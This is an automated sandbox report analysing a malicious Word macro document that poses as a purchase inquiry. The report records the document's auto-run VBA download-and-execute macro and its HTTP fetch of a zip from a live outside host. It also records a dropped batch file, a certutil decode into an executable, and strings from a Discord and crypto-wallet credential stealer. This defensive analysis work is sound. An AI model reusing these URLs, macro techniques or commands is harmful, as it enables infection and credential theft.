
Windows Analysis Report
Purchase_Inquiry_1.doc

Overview

General Information

Sample name: Purchase_Inquiry_1.doc
Analysis ID: 1628942
MD5: a9bddd4272a1020b5b36be097f8a80f8
SHA1: 5b7368f5a8b040dfdccfd6421f5d1e823aceb65a
SHA256: 25dceeb01ea833d9dfd54c933f7c0f019079e86db670af3e2171c31e730dbe77
Tags: docuser-TeamDreier

Detection

Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Document exploit detected (creates forbidden files)
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document exploit detected (process start blacklist hit)
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious ZIP file
Microsoft Office drops suspicious files
Office process queries suspicious COM object (likely to drop second stage)
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Legitimate Application Dropped Archive
Sigma detected: Legitimate Application Dropped Executable
Sigma detected: Suspicious Microsoft Office Child Process
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
PE file overlay found
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer

Classification

  • System is w10x64
  • WINWORD.EXE (PID: 5560 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
    • cmd.exe (PID: 7412 cmdline: C:\Windows\system32\cmd.exe /c ""C:\5564642\Ppo.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • certutil.exe (PID: 7668 cmdline: certutil -decode C:\Users\user\AppData\Local\Temp\i19ag96bvk.txt C:\Users\user\AppData\Local\Temp\i19ag96bvk.exe MD5: 0DDA4F16AE041578B4E250AE12E06EB1)
    • cmd.exe (PID: 7612 cmdline: C:\Windows\system32\cmd.exe /c ""C:\3546255\Ppo.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • certutil.exe (PID: 7756 cmdline: certutil -decode C:\Users\user\AppData\Local\Temp\i19ag96bvk.txt C:\Users\user\AppData\Local\Temp\i19ag96bvk.exe MD5: 0DDA4F16AE041578B4E250AE12E06EB1)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: certutil.exe PID: 7756 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
14.2.certutil.exe.910a78.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
14.2.certutil.exe.910a78.0.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

          System Summary

          Source: File created; Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ProcessId: 5560, TargetFilename: C:\5564642\Ppo.bat
          Source: File created; Author: frack113, Florian Roth; Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ProcessId: 5560, TargetFilename: C:\5564642\1741130958.zip
          Source: File created; Author: frack113, Florian Roth (Nextron Systems); Data: EventID: 11, Image: C:\Windows\SysWOW64\certutil.exe, ProcessId: 7668, TargetFilename: C:\Users\user\AppData\Local\Temp\i19ag96bvk.exe
          Source: Process started; Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io; Data: Command: C:\Windows\system32\cmd.exe /c ""C:\5564642\Ppo.bat" ", CommandLine: C:\Windows\system32\cmd.exe /c ""C:\5564642\Ppo.bat" ", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 5560, ParentProcessName: WINWORD.EXE, ProcessCommandLine: C:\Windows\system32\cmd.exe /c ""C:\5564642\Ppo.bat" ", ProcessId: 7412, ProcessName: cmd.exe
          Source: Network Connection; Author: X__Junior (Nextron Systems); Data: DestinationIp: 192.168.2.6, DestinationIsIpv6: false, DestinationPort: 49719, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, Initiated: true, ProcessId: 5560, Protocol: tcp, SourceIp: 212.27.63.154, SourceIsIpv6: false, SourcePort: 80
          No Suricata rule has matched

          AV Detection

          Source: Purchase_Inquiry_1.doc, Avira: detected
          Source: Purchase_Inquiry_1.doc, Virustotal: Detection: 53%
          Source: Purchase_Inquiry_1.doc, ReversingLabs: Detection: 47%
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

          Software Vulnerabilities

          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, File created: C:\5564642\Ppo.bat
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, File created: C:\3546255\Ppo.bat
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, Process created: C:\Windows\SysWOW64\cmd.exe
          Source: global traffic, DNS query: name: portalsphere.free.fr
          Source: global traffic, TCP traffic: 192.168.2.6:49719 -> 212.27.63.154:80
          Source: global traffic, TCP traffic: 212.27.63.154:80 -> 192.168.2.6:49719
          Source: global traffic, HTTP traffic detected:
            GET /phUploader/uploads/1741130958.zip HTTP/1.1
            Accept: */*
            Accept-Language: en-ch
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: portalsphere.free.fr
            Connection: Keep-Alive
          Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global traffic, HTTP traffic detected:
            HTTP/1.1 200 OK
            Date: Tue, 04 Mar 2025 08:50:19 GMT
            Server: Apache/ProXad [Jan 23 2019 20:05:46]
            Last-Modified: Mon, 03 Mar 2025 20:00:17 GMT
            ETag: "2e4e0d125-1736c-67c60a51"
            Connection: close
            Accept-Ranges: bytes
            Content-Length: 95084
            Content-Type: application/zip
          Source: global traffic, HTTP traffic detected:
            GET /phUploader/uploads/1741130958.zip HTTP/1.1
            Accept: */*
            Accept-Language: en-ch
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: portalsphere.free.fr
            Connection: Keep-Alive
          Source: global traffic, DNS traffic detected: DNS query: portalsphere.free.fr
          Source: certutil.exe, 0000000D.00000002.2323832707.0000000003598000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, i19ag96bvk.exe.13.dr; String found in binary or memory: http://ip-api.com/json/?fie
          Source: certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ip-api.com/json/?fields=225545
          Source: certutil.exe, 0000000D.00000002.2323832707.0000000003598000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, i19ag96bvk.exe.13.dr; String found in binary or memory: http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-
          Source: Purchase_Inquiry_1.doc; String found in binary or memory: http://portalsphere.free.fr/phUploader/uploads/1741111253.zip
          Source: Purchase_Inquiry_1.doc; String found in binary or memory: http://portalsphere.free.fr/phUploader/uploads/1741130958.zip
          Source: certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://discord.com/api/v10/users/
          Source: certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://discordapp.com/api/v9/users/
          Source: certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://github.com/PyDevOG/Divulge-Stealer
          Source: certutil.exe, 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://gstatic.com/generate_204g==================Divulge

          System Summary

          Source: screenshot, OCR: Enable Editing" from the yellow bar above Microsoft Word File Error loadingplease sender.. 113 chara
          Source: screenshot, OCR: Enable Editing" from the yellow bar above 113 characters (an approximate value) p Type here to searc
          Source: screenshot, OCR: Enable Editing" from the yellow bar above t.licrcscft p Type here to search ENG SG 03:50 04/03/2025
          Source: VBA code instrumentation, OLE, VBA macro: Module ThisDocument, Function DownloadUnzipAndRun, API IWshShell3.Run("C:\3546255\\Ppo.bat"); Name: DownloadUnzipAndRun
          Source: VBA code instrumentation, OLE, VBA macro: Module ThisDocument, Function DownloadUnzipAndRun, API IWshShell3.Run("C:\5564642\\Ppo.bat"); Name: DownloadUnzipAndRun
          Source: Purchase_Inquiry_1.doc, OLE, VBA macro line: Set objShell = CreateObject("WScript.Shell")
          Source: VBA code instrumentation, OLE, VBA macro: Module ThisDocument, Function DownloadUnzipAndRun, String wscript: Set objShell = CreateObject("WScript.Shell"); Name: DownloadUnzipAndRun
          Source: Purchase_Inquiry_1.doc, Stream path 'Macros/VBA/ThisDocument': found possibly 'ADODB.Stream' functions open, savetofile, write
          Source: VBA code instrumentation, OLE, VBA macro: Module ThisDocument, Function downloadFile, API IServerXMLHTTPRequest2.Open("GET","http://portalsphere.free.fr/phUploader/uploads/1741130958.zip",False); Name: downloadFile
          Source: VBA code instrumentation, OLE, VBA macro: Module ThisDocument, Function downloadFile, API Stream.Open(); Name: downloadFile
          Source: VBA code instrumentation, OLE, VBA macro: Module ThisDocument, Function downloadFile, API Stream.Write(<binary payload, not reproduced here>); Name: downloadFile
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function downloadFile, found possibly 'ADODB.Stream' functions open, savetofile, write | Name: downloadFile
Source: Purchase_Inquiry_1.doc | Stream path 'Macros/VBA/ThisDocument': found possibly 'XMLHttpRequest' functions response, responsebody, status, open, send
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function downloadFile, found possibly 'XMLHttpRequest' functions response, responsebody, status, open, send | Name: downloadFile
Source: 1741130958.zip.0.dr | Zip Entry: Ppo.bat
Source: 1741130958.zip0.0.dr | Zip Entry: Ppo.bat
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | File created: C:\5564642\Ppo.bat
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | File created: C:\3546255\Ppo.bat
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | COM Object queried: XML HTTP Request HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}\InProcServer32
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\InprocServer32
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{13709620-C279-11CE-A49E-444553540000}\InProcServer32
Source: Purchase_Inquiry_1.doc | OLE, VBA macro line: Sub Document_Open()
Source: Purchase_Inquiry_1.doc | OLE, VBA macro line: Sub AutoOpen()
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function Document_Open | Name: Document_Open
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function AutoOpen | Name: AutoOpen
Source: Purchase_Inquiry_1.doc | OLE indicator, VBA macros: true
Source: Purchase_Inquiry_1.doc | Stream path 'Macros/VBA/__SRP_0': http://portalsphere.free.fr/phUploader/uploads/1741111253.zisC:\\1741111253.zixWScript.Shell2The file is safe to download but If file failed to load correctly for view then contact sender..\pp.exeRunVBE7.DLL!!!S!R!Q1!eQ!q"Microsoft.XMLHTTSGETOpenSendStatusADODB.StreamTypeResponseBodyWriteSaveToFileClose pyDESTk4gALtQyxDEST`PDEST=
Source: i19ag96bvk.exe.13.dr | Static PE information: No import functions for PE file found
Source: i19ag96bvk.exe.13.dr | Static PE information: Data appended to the last section found
Source: classification engine | Classification label: mal100.spyw.expl.winDOC@18/10@1/1
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | File created: C:\Users\user\Desktop\~$rchase_Inquiry_1.doc
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\{4456C4CF-3403-4529-B43A-495ED11BAAFF} - OProcSessId.dat
Source: Purchase_Inquiry_1.doc | OLE indicator, Word Document stream: true
Source: Purchase_Inquiry_1.doc | OLE document summary: title field not present or empty
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\5564642\Ppo.bat" "
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\certutil.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Purchase_Inquiry_1.doc | Virustotal: Detection: 53%
Source: Purchase_Inquiry_1.doc | ReversingLabs: Detection: 47%
Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\5564642\Ppo.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\3546255\Ppo.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\certutil.exe certutil -decode C:\Users\user\AppData\Local\Temp\i19ag96bvk.txt C:\Users\user\AppData\Local\Temp\i19ag96bvk.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\certutil.exe certutil -decode C:\Users\user\AppData\Local\Temp\i19ag96bvk.txt C:\Users\user\AppData\Local\Temp\i19ag96bvk.exe
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\5564642\Ppo.bat" "
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\3546255\Ppo.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\certutil.exe certutil -decode C:\Users\user\AppData\Local\Temp\i19ag96bvk.txt C:\Users\user\AppData\Local\Temp\i19ag96bvk.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\certutil.exe certutil -decode C:\Users\user\AppData\Local\Temp\i19ag96bvk.txt C:\Users\user\AppData\Local\Temp\i19ag96bvk.exe
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: dui70.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: duser.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: windows.ui.immersive.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: bcp47mrm.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: uianimation.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: d3d10warp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: dxcore.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: textshaping.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: dui70.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: duser.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: windows.ui.immersive.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: bcp47mrm.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: uianimation.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: d3d10warp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: dxcore.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: textshaping.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: certcli.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: cryptui.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: certca.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: certcli.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: cryptui.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: certca.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\certutil.exe | Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | Automated click: OK
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | Automated click: OK
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
Source: i19ag96bvk.exe.13.dr | Static PE information: 0xF5959D04 [Sun Jul 25 18:23:00 2100 UTC]
Source: C:\Windows\SysWOW64\certutil.exe | File created: C:\Users\user\AppData\Local\Temp\i19ag96bvk.exe (dropped file)
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX (this entry is repeated 113 times in the report)
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
